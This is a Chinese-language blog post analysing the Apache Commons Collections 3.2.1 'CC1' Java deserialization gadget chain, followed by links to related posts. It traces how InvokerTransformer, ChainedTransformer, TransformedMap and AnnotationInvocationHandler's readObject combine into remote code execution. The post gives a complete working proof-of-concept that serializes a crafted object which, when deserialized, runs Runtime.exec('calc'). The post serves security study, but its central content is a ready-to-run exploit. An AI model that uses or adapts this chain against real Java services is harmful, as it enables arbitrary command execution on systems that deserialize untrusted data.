Commons Collections1 反序列化分析

已于 2024-02-27 10:33:47 修改
阅读量892 收藏 19
点赞数 28
文章标签: java 网络安全 web安全 网络攻击模型
于 2024-02-19 12:34:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63217130/article/details/136167730
版权

Commons Collections1

#影响Commons Collections版本<=3.2.1

sink点

由于transform函数 输入的对象是object类相当于任意类 然后invoke反射调用该类的任意方法,造成调用任意类的任意方法

public Object transform(Object input) {
if (input == null) {
	return null;
} else {
	try {
		Class cls = input.getClass();
		Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
		return method.invoke(input, this.iArgs);
	} catch (NoSuchMethodException var4) {
		throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
	} catch (IllegalAccessException var5) {
		throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
	} catch (InvocationTargetException var6) {
		throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var6);
	}
}
}

以上方法位于InvokerTransformer类中 使用如下代码尝试RCE

public class cc1 {
	public static void main(String[] args) throws Exception{
		Runtime r = Runtime.getRuntime();
		new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(r);
	}
}

初始化时 传入的方法是exec 参数是calc

这里就 通过反射获取Runtime类然后调用exec参数是calc

Godget链

那么已知Transform方法能够RCE那么就回溯寻找到调用了Transform的类中的checksetvalue方法

这里就从TransformedMap入手吧

那么要调用checksetvalue函数,就要先通过构造方法给这个valueTransformer赋值,而valueTransformer必须是InvokerTransformer类才能进入InvokerTransformer的transform中,或者另外一个类他含有transform方法而且其transform方法可以调用InvokerTransformer的transform方法也就是ChainedTransformer这个类,这两种方法都可以。

这里看到decorate方法调用了protected的构造方法,之后就可以checksetvalue了。

再来找找有没有哪个地方调用了checksetvalue

static class MapEntry extends AbstractMapEntryDecorator {

	/** The parent map */
	private final AbstractInputCheckedMapDecorator parent;

	protected MapEntry(Map.Entry entry, AbstractInputCheckedMapDecorator parent) {
		super(entry);
		this.parent = parent;
	}

	public Object setValue(Object value) {
		value = parent.checkSetValue(value);
		return entry.setValue(value);
	}
}

这里可以看到 如果有一个MapEntry的类调用了setvalue那么就可以进一步调用checkSetValue然后调用Transform尝试RCE了

再来找找哪个类调用了setvalue,那么这个类很可能就是MapEntry类或者其子类

最后找到这里,他的readobject方法里面调用了setValue方法,由于这个readobject是类名为AnnotationInvocationHandler里面的readobject,因此我们要进行反序列化RCE的话就要创建一个AnnotationInvocationHandler对象并且序列化

由于AnnotationInvocationHandler类不是public修饰的,所以需要通过反射来创建对象

Class<?> c1 = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor annotationInvocationHandlerConstructor = c1.getDeclaredConstructor(Class.class, Map.class);
annotationInvocationHandlerConstructor.setAccessible(true);
Object o = annotationInvocationHandlerConstructor.newInstance(Target.class,transfromedMap);

这个transfromedMap和Target.class两个参数下面会讲

查看一下他的readpbject方法 type参数是一个注解类

    private final Class<? extends Annotation> type;
    private final Map<String, Object> memberValues;

/*
这两行代码定义了一个类中的两个成员变量,分别是type和memberValues。

type是一个Class类型的变量,限定了该Class必须是Annotation的子类。这个变量存储了注解的类型信息是一个注解类。

memberValues是一个Map类型的变量,存储了注解中的成员变量名和对应的值。在Java中,注解可以有成员变量,这些成员变量可以在注解中赋值。memberValues这个Map存储了这些成员变量和对应的值,可以通过成员变量的名字来获取对应的值。*/

AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {
        this.type = type;
        this.memberValues = memberValues;
    }
//这是构造方法用于赋初值

private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
        s.defaultReadObject();


        // Check to make sure that types have not evolved incompatibly

        AnnotationType annotationType = null;
        try {
            annotationType = AnnotationType.getInstance(type);
        } catch(IllegalArgumentException e) {
            // Class is no longer an annotation type; all bets are off
            return;
        }

        Map<String, Class<?>> memberTypes = annotationType.memberTypes();

        for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
            String name = memberValue.getKey();
            Class<?> memberType = memberTypes.get(name);
            if (memberType != null) {  // i.e. member still exists
                Object value = memberValue.getValue();
                if (!(memberType.isInstance(value) ||
                      value instanceof ExceptionProxy)) {
                    memberValue.setValue(
                        new AnnotationTypeMismatchExceptionProxy(
                            value.getClass() + "[" + value + "]").setMember(
                                annotationType.members().get(name)));
                }
            }
        }
    }

获取给定注解类型的AnnotationType对象

annotationType = AnnotationType.getInstance(type);

获取annotationType(注解类对象)的成员 封装成Map 一组键值对

Map<String, Class<?>> memberTypes = annotationType.memberTypes();

获取当前遍历的map的元素的key

String name = memberValue.getKey();

根据name 获取当前memberTypes的成员变量

Class<?> memberType = memberTypes.get(name);

后面有个if判断

if (memberType != null) {  // i.e. member still exists
                Object value = memberValue.getValue();
                if (!(memberType.isInstance(value) ||
                      value instanceof ExceptionProxy)) {
                    memberValue.setValue(
                        new AnnotationTypeMismatchExceptionProxy(
                            value.getClass() + "[" + value + "]").setMember(
                                annotationType.members().get(name)));
                }
            }

要让两个判断返回true 要求 memberType != null即传入的注解类需要有成员方法 而且名字要为memberValue中的key相同

最终poc

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;

public class cc1 {
    public static void main(String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException, ClassNotFoundException {

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value","value");
        Map<Object,Object> transfromedMap = TransformedMap.decorate(map, null, chainedTransformer);

        Class<?> c1 = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationHandlerConstructor = c1.getDeclaredConstructor(Class.class, Map.class);
        annotationInvocationHandlerConstructor.setAccessible(true);
        Object o = annotationInvocationHandlerConstructor.newInstance(Target.class,transfromedMap);


        serialize(o);
        unserialize("ser.bin");

    }

    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static Object unserialize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));
        return ois.readObject();
    }
}

Problems||困惑

Map<Object,Object> transfromedMap = TransformedMap.decorate(map, null, chainedTransformer);

transfromedMap传入chainedTransformer是因为上文所述chainedTransformer含有transform方法而且其transform方法可以调用InvokerTransformer的transform方法

TransformedMap a = new TransformedMap(); //报错
Map<Object,Object> transfromedMap = TransformedMap.decorate(map, null, chainedTransformer);//正常

第一个报错虽然TransformedMap类是public但是其构造函数是protected,也会导致在其他包中无法直接访问,所以报错,但是第二种方法不会报错因为decorate是public

memberValue.setValue(
	new AnnotationTypeMismatchExceptionProxy(
		value.getClass() + "[" + value + "]").setMember(
			annotationType.members().get(name)));
}

这里明明setvalue的值不可控为何可以成功RCE呢?

我们跟踪一下 在setvalue的时候会走到这里

他的parent父类是transformedmap,后面setvalue的也是transformedmap而value任然是我们不可控的,其实后面会发现我们压根不用管这个value它可以被覆盖

我们再来看看transformedmap的checkSetValue调用过程

前面进行了decorate

decorate调用了TransformedMap构造函数

所以是chainedTransformer调用了transform value任然是那个不可控的参数

进入chainedTransformer的transform方法看看 之前将poc中的transformers赋值给了iTransformers

所以这里 iTransformers就是chainedTransformer,而object就是之前的value是不可控的

i=0的时候 object还是不可控的那个参数

i=1之后 object就是Runtime了 就可以 transform之后 就调用反射创建了这个Runtime对象并return给下一个循环

这里iTransformers[0]需要是ConstanTransform是因为 他的transform方法返回的是其本身的iConstant而不是input

如图 即使input是那个不可控的但是iConstant是咱们可控的 所以原来的input压根没用了被覆盖了 所以i=1之后 object就是Runtime了

后面就是正常的链式调用RCE了

Ting丶丶
关注
apache-commons-collections1反序列化分析
11-30 473
apache-commons-collections1反序列化分析 调试环境 commins-collections3.1 JDK7 漏洞分析 在InvokerTransformer类中的transform方法存在一组反射方法执行 只要能控制参数input、iMethodName、iParamTypes和iArgs,就能调用Runtime.exec执行系统命令!iMethodName、iParamTypes和iArgs是通过构造方法赋值,很明显其值可控 现在要让input参数可控并且为Runtime对
Commons-Collections1反序列化
m0_62770485的博客
12-05 698
JAVA安全-Commons-Collections1反序列化
Apache Commons Collection3.2.1反序列化分析(CC1)
st3pby的博客
01-29 2000
是Apache软件基金会的一个开源项目,它提供了一组可复用的数据结构和算法的实现,旨在扩展和增强Java集合框架,以便更好地满足不同类型应用的需求。该项目包含了多种不同类型的集合类、迭代器、队列、堆栈、映射、列表、集等数据结构实现,以及许多实用程序类和算法实现。它的代码质量较高,被广泛应用于Java应用程序开发中。Commons Collections 3.1 版本的利用链衍生出多个版本的利用方式,但其核心部分是相同的,不同之处在于中间过程的构造。
JAVA 反序列化之 Apache Commons Collections 反序列化漏洞分析
辛勤搬砖的门卫的专栏
03-01 2024
Apache Commons Collections 反序列化漏洞研究
浅谈Commons-Collections1 反序列化
Le1a's Blog
03-23 627
Java CC链
commons-collections1(cc1)反序列化分析
遇事不决冲冲冲
01-30 5178
commons-collections1也就是常说的cc1,网上一般有两条链子,一个就是ysoserial中的lazymap链,还有transformedmap链,刚开始碰到cc1链子感觉有点麻烦,但只要迈出第一步后面就会挺流畅的,首先在细跟之前一定要有一个大的框架,哪一步完了再跟进到哪一步,像cc1这里主要就是Transformer接口里三个主要的实现类来实现命令执行,然后通过两个不同方法调用执行,即可!
漫谈Commons-Collections反序列化
热门推荐
Summer's blog
06-02 1万+
Java组件Commons-Collections被广泛用于各大系统中,在几年前的被爆出反序列化漏洞,从此打开了Java安全的大门。全网最易懂的反序列化分析文章,花了大量的流程图帮助理解。
CommonCollections1反序列化利用链分析
道阻且长,行则将至。
07-30 1265
文章目录前言CC1利用链CC1环境部署Java命令执行 前言 在前面的文章 JAVA代码审计之Shiro反序列化漏洞分析 中介绍了 Java 反序列化漏洞原理、并通过 IDEA 动态调试分析了 CVE-2016-4437 Apache Shiro 反序列化漏洞的程序存在可被用户控制的序列化数值的形成( RememberMe 字段使用的 Cookie = Base64(AES(Serializable(用户ID))))。 反序列化漏洞的成因在于应用程序把其他格式的数据(如字节流,XML 数据、JSON 格
commons-collections2(cc2)反序列化分析
遇事不决冲冲冲
02-16 3264
大的思路是将恶意参数放到`TemplatesImpl`类中的`_bytecodes`属性中,反射构造`PriorityQueue`队列的`comparator`和`queue`两个字段,将`PriorityQueue`队列的`comparator`字段设置为`TransformingComparator`(创建一个`InvokerTransformer`并传递一个`newTransformer`方法,然后将`InvokerTransformer`方法名传递给`TransformingComparator`)
Commons Collections反序列化
12-15
2. **代码审查**:检查代码中是否存在使用`DeserializeUtils`或其他类似反序列化函数的地方,如果有,需要评估是否可以避免反序列化或者使用更安全的方式。 3. **使用安全反序列化库**:例如使用`Jackson`或`Gson...
apache-commons-collections2反序列化分析
12-01 697
apache-commons-collections2反序列化分析 在审计完apache-commons-collections1反序列化链之后,继续审计apache-commons-collections系列的反序列化链,下面根据ysoserial工具生成CommonsCollections2反序列化链payload的思路一步步分析 前景知识 ysoserial工具生成payload的时候用到了动态生成类和PriorityQueue队列,之前也没接触过,下面简单记录一下 JAVAssite动态生成类 百
基于Hive和Hadoop的哔哩哔哩网站分析系统
图南的博客
09-27 594
本项目是一个基于大数据技术的哔哩哔哩平台分析系统,旨在为用户提供全面的哔哩哔哩视频数据和深入的用户行为分析。系统采用 Hadoop 平台进行大规模数据存储和处理,利用 MapReduce 进行数据分析和处理,通过 Sqoop 实现数据的导入导出,以 Spark 为核心进行高效的数据处理。整个系统结合了大数据处理技术,为用户提供精准的内容推荐和深入的用户兴趣分析,帮助平台更好地了解视频趋势和用户需求。
JavaScript ArrayBuffer的读写与类型转换
最新发布
白瑕 的博客
10-01 240
所有视图的基本单位是ArrayBuffer, ArrayBuffer中只存储二进制格式的数据.ArrayBuffer不可直接读写, 必须通过视图(比如DataView)暴露的API.
Spring Cloud全解析:服务调用之OpenFeign集成OkHttp
Lxn2zh的博客
09-30 461
HTTP连接需要进行TCP三次握手,是一个比较耗时的操作,一般我们不直接使用HttpURLConnection,而是使用HttpClient/okHttp等支持连接池的客户端工具,以Feign集成OkHttp为例。OpenFeign本质是HTTP来进行服务调用的,也就是需要集成一个Http客户端。默认是HttpURLConnection方式,也就是jdk中提供的最原始的那个。要开启OkHttp ,还需要在YML 中添加开启配置项,默认是关闭的。使用的是Client接口来进行请求的。
Java内存布局
阿呆的专栏
10-01 566
64位 JVM 不启用指针压缩时:Object Header 大小是16字节。64位 JVM 启用指针压缩时(默认):Object Header 大小是12字节。32位 JVM:Object Header 大小是8字节。JVM在默认情况下启用指针压缩,但如果堆内存超过32GB,就会禁用指针压缩。32GB是压缩指针的最大寻址范围。超过32GB的堆内存中,压缩指针带来的性能提升并不显著,而且需要解压指针反而可能增加开销。
C#基础:掌握控制流语句,构建灵活的程序逻辑
学习和分享
09-28 296
在C#中,控制流语句是用来控制程序执行流程的重要部分。它们允许你根据条件执行不同的代码块,或者重复执行某些代码块直到满足特定条件。
进程管理工具:非daemon进程管理工具supervisor
happy_king_zi的博客
09-29 1090
supervisor是一个 Client/Server模式的系统,允许用户在类unix操作系统上监视和控制多个进程,或者可以说是多个程序。supervisor与launchd,daemontools,runit等程序有着相同的功能,与其中某些程序不同的是,它并不作为“id 为 1的进程”而替代init。相反,它用于控制应用程序,像启动其它程序一样,通俗理解就是,把Supervisor服务管理的进程程序,它们作为supervisor的子进程来运行,而supervisor是父进程。
【RocketMQ】RocketMQ应用难点
记录一名在读研究生的学习笔记、感悟、开发产物
09-30 620
本文探讨了RocketMQ中消息重复消费的问题及其解决方案,尤其是在CLUSTERING模式下的扩容影响。文章分析了重复消费的原因,如广播模式、负载均衡模式下的多consumerGroup消费、消费者组内的动态变化及网络延迟等,并提出了利用唯一标识进行去重的方法。此外,还讨论了如何选择合适的存储机制以高效处理大量消息标识,如HashMap、MySQL、Redis以及推荐的布隆过滤器等方案。对于防止消息堆积与确保消息不丢失,也给出了相应的策略和技术措施。
weblogic反序列化原理
06-09
WebLogic反序列化漏洞的原理是在WebLogic ...由于Apache Commons Collections库中的一些可序列化类存在漏洞,攻击者可以通过构造特定的序列化数据,使WebLogic Server在反序列化时触发漏洞,从而执行攻击者的恶意代码。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值